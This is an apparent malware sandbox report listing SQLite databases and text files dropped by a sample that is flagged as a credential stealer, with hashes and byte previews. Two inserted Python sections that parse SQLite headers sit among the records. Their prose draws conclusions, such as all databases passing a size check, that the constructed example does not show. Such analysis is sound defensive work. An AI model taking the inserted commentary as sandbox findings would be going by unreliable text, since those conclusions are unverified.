                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
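The File Type and Preview fields for the SQLite databases dropped by wjoqZlIS.exe above are both derived from the 100-byte SQLite header, and the report's Size (bytes) values are exactly page size times page count (52 x 2048 = 106496, 24 x 2048 = 49152, 56 x 2048 = 114688). The following Python is an added example, not part of the Joe Sandbox output, that decodes such a header the way libmagic does, renders the same dotted preview, and checks that the copied database is complete. It assumes the published SQLite 3 file format layout; the image it builds is constructed from the field values in the first entry above with zero-filled pages, so its entropy is lower than the reported 1.13 bits, which came from real schema and row data.

```python
import math
import struct

# Offsets below are those of the 100-byte SQLite 3 file header (published format).
MAGIC = b"SQLite format 3\x00"
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def build_header(page_size, change_counter, pages, cookie, schema_format,
                 text_encoding, version_valid_for, sqlite_version):
    """Constructed header: the named fields come from the report's File Type line,
    the bytes between them are the defaults SQLite itself writes."""
    h = bytearray(100)
    h[0:16] = MAGIC
    struct.pack_into(">H", h, 16, page_size)
    h[18] = h[19] = 1                  # write/read format 1 = rollback journal
    h[21], h[22], h[23] = 64, 32, 32   # payload fractions: the "@  " in the previews
    struct.pack_into(">I", h, 24, change_counter)
    struct.pack_into(">I", h, 28, pages)
    struct.pack_into(">I", h, 40, cookie)
    struct.pack_into(">I", h, 44, schema_format)
    struct.pack_into(">I", h, 56, text_encoding)
    struct.pack_into(">I", h, 92, version_valid_for)
    struct.pack_into(">I", h, 96, sqlite_version)
    return bytes(h)


def build_image(**kw):
    """Header followed by zero-filled pages, so the image has the reported size."""
    h = build_header(**kw)
    return h + bytes(kw["page_size"] * kw["pages"] - len(h))


def parse_header(data):
    if len(data) < 100 or data[:16] != MAGIC:
        raise ValueError("not a SQLite 3 database")
    page_size = struct.unpack_from(">H", data, 16)[0]
    if page_size == 1:                 # the format encodes 65536 as 1
        page_size = 65536
    u32 = lambda off: struct.unpack_from(">I", data, off)[0]
    return {
        "page_size": page_size,
        "change_counter": u32(24),
        "pages": u32(28),
        "cookie": u32(40),
        "schema_format": u32(44),
        "text_encoding": u32(56),
        "version_valid_for": u32(92),
        "sqlite_version": u32(96),
    }


def describe(data):
    """Reproduce the File Type line the report prints for each database."""
    f = parse_header(data)
    return ("SQLite 3.x database, last written using SQLite version "
            f"{f['sqlite_version']}, page size {f['page_size']}, "
            f"file counter {f['change_counter']}, database pages {f['pages']}, "
            f"cookie 0x{f['cookie']:x}, schema {f['schema_format']}, "
            f"{ENCODINGS.get(f['text_encoding'], 'unknown encoding')}, "
            f"version-valid-for {f['version_valid_for']}")


def preview(data, n=44):
    """Render bytes the way the report's Preview field does: printable ASCII
    kept, everything else shown as a dot."""
    return "".join(chr(b) if 0x20 <= b < 0x7f else "." for b in data[:n])


def size_is_consistent(data):
    """The in-header page count is only authoritative when version-valid-for equals
    the change counter; a truncated or partially copied database fails this check."""
    f = parse_header(data)
    if f["version_valid_for"] != f["change_counter"]:
        return False
    return len(data) == f["pages"] * f["page_size"]


def shannon_entropy(data):
    """Bits per byte, the same measure as the report's Entropy (8bit) field."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


# Constructed image mirroring the first entry above (52 pages of 2048 bytes).
SAMPLE_DB = build_image(page_size=2048, change_counter=3, pages=52, cookie=0x21,
                        schema_format=4, text_encoding=1, version_valid_for=3,
                        sqlite_version=3042000)

if __name__ == "__main__":
    print(describe(SAMPLE_DB))
    print(preview(SAMPLE_DB))
    print("size consistent:", size_is_consistent(SAMPLE_DB))
    print(f"entropy: {shannon_entropy(SAMPLE_DB):.3f}")
```

Reading the preview through the header layout explains the visible characters: the "@" is the 64 at offset 21, the "4" and "8" at offset 31 are the page counts 52 and 56, the "!" and "$" at offset 43 are the schema cookies 0x21 and 0x24, and the "O}" near offset 98 is the low bytes of SQLite version 3035005 (0x2E4F7D). Because all three databases pass the size check, they are complete copies rather than partial writes, which is what one would expect from a stealer copying browser databases out of a locked profile before reading them.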
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.695685570184741
                                                                                Encrypted:false
                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                Malicious:false
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.701757898321461
                                                                                Encrypted:false
                                                                                SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                MD5:520219000D5681B63804A2D138617B27
                                                                                SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                Malicious:false
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):98304
                                                                                Entropy (8bit):0.08235737944063153
                                                                                Encrypted:false
                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                Malicious:false
                                                                                Preview:SQLite format 3
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
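The "File Type" line in each dropped-file record is a libmagic rendering of the 100-byte header at the start of every SQLite 3 database: page size, file change counter, page count, schema cookie, schema format, text encoding, the version-valid-for counter and the SQLITE_VERSION_NUMBER of the library that last wrote the file. Reparsing that header from the raw bytes is a quick way to confirm that a dropped file is a complete, unmodified database rather than a truncated or still-being-written copy, because an intact database is exactly page_size times database_pages bytes (2048 x 52 = 106496 here). The parser below is an added example, not part of the Joe Sandbox report; the header bytes it builds are constructed from the values in this record, not read from the dropped file itself.

```python
import struct

# Field offsets of the 100-byte SQLite database header (sqlite.org/fileformat.html).
MAGIC = b"SQLite format 3\x00"
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def parse_sqlite_header(data: bytes) -> dict:
    """Parse the header fields that the report's 'File Type' line is derived from."""
    if len(data) < 100 or data[:16] != MAGIC:
        raise ValueError("not an SQLite 3 database header")
    page_size = struct.unpack_from(">H", data, 16)[0]
    if page_size == 1:  # 65536 does not fit in 16 bits and is encoded as 1
        page_size = 65536
    change_counter, db_pages = struct.unpack_from(">II", data, 24)
    schema_cookie, schema_format = struct.unpack_from(">II", data, 40)
    text_encoding = struct.unpack_from(">I", data, 56)[0]
    version_valid_for, sqlite_version = struct.unpack_from(">II", data, 92)
    return {
        "page_size": page_size,
        "file_counter": change_counter,
        "database_pages": db_pages,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "text_encoding": TEXT_ENCODINGS.get(text_encoding, f"unknown({text_encoding})"),
        "version_valid_for": version_valid_for,
        "sqlite_version": sqlite_version,
    }


def describe(hdr: dict) -> str:
    """Render the parsed fields in the same shape as the report's 'File Type' line."""
    return (
        f"SQLite 3.x database, last written using SQLite version {hdr['sqlite_version']}, "
        f"page size {hdr['page_size']}, file counter {hdr['file_counter']}, "
        f"database pages {hdr['database_pages']}, cookie {hdr['schema_cookie']:#x}, "
        f"schema {hdr['schema_format']}, {hdr['text_encoding']}, "
        f"version-valid-for {hdr['version_valid_for']}"
    )


def expected_size(hdr: dict) -> int:
    """An intact database file is exactly page_size * database_pages bytes long."""
    return hdr["page_size"] * hdr["database_pages"]


def check_dropped_file(data: bytes, reported_size: int) -> bool:
    """True if the header parses and the reported on-disk size matches the page count."""
    try:
        hdr = parse_sqlite_header(data)
    except ValueError:
        return False
    return expected_size(hdr) == reported_size


def build_header(page_size=2048, file_counter=3, database_pages=52, schema_cookie=0x21,
                 schema_format=4, text_encoding=1, version_valid_for=3,
                 sqlite_version=3042000) -> bytes:
    """Constructed 100-byte header (assumed values from this record, not the real file's bytes)."""
    hdr = bytearray(100)
    hdr[0:16] = MAGIC
    struct.pack_into(">H", hdr, 16, page_size)
    hdr[18] = hdr[19] = 1               # legacy (rollback-journal) write/read format
    hdr[21:24] = bytes([64, 32, 32])    # fixed max/min/leaf payload fractions
    struct.pack_into(">II", hdr, 24, file_counter, database_pages)
    struct.pack_into(">II", hdr, 40, schema_cookie, schema_format)
    struct.pack_into(">I", hdr, 56, text_encoding)
    struct.pack_into(">II", hdr, 92, version_valid_for, sqlite_version)
    return bytes(hdr)


if __name__ == "__main__":
    header = build_header()
    parsed = parse_sqlite_header(header)
    print(describe(parsed))
    print("expected size:", expected_size(parsed), "consistent:", check_dropped_file(header, 106496))
```

On a real dropped file, read the first 100 bytes of the file and pass them to parse_sqlite_header together with the file's actual length; a mismatch between expected_size and the length is the signal to look for truncation or a WAL/journal sidecar before opening the database in a viewer.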
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\Ekpb7jn7mf.exe
                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):97792
                                                                                Entropy (8bit):5.960605794636107
                                                                                Encrypted:false
                                                                                SSDEEP:1536:Nqs4iqeHlbG6jejoigIH43Ywzi0Zb78ivombfexv0ujXyyed2vteulgS6pIl:7/pVYH+zi0ZbYe1g0ujyzdbI
                                                                                MD5:EAB323FA6C66098BE1068FEF0A03BFF2
                                                                                SHA1:AE2A4B7D9FE9DB57AFCDA3F7AA599D13EEEA4551
                                                                                SHA-256:B978A85D1EF238362AFAFC770A8DA33C6149F54F8767B0F5753F069EB4E0DFFF
                                                                                SHA-512:97BB7D82FAC8D1885806323BB113EBC41EDF90110D5D447BDAD6FE3EF89CBD6226ECEE8BF3419BF00FA2748008F887C17C783FAF1785FBE3C817D32F7D502AAF
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: Joe Security
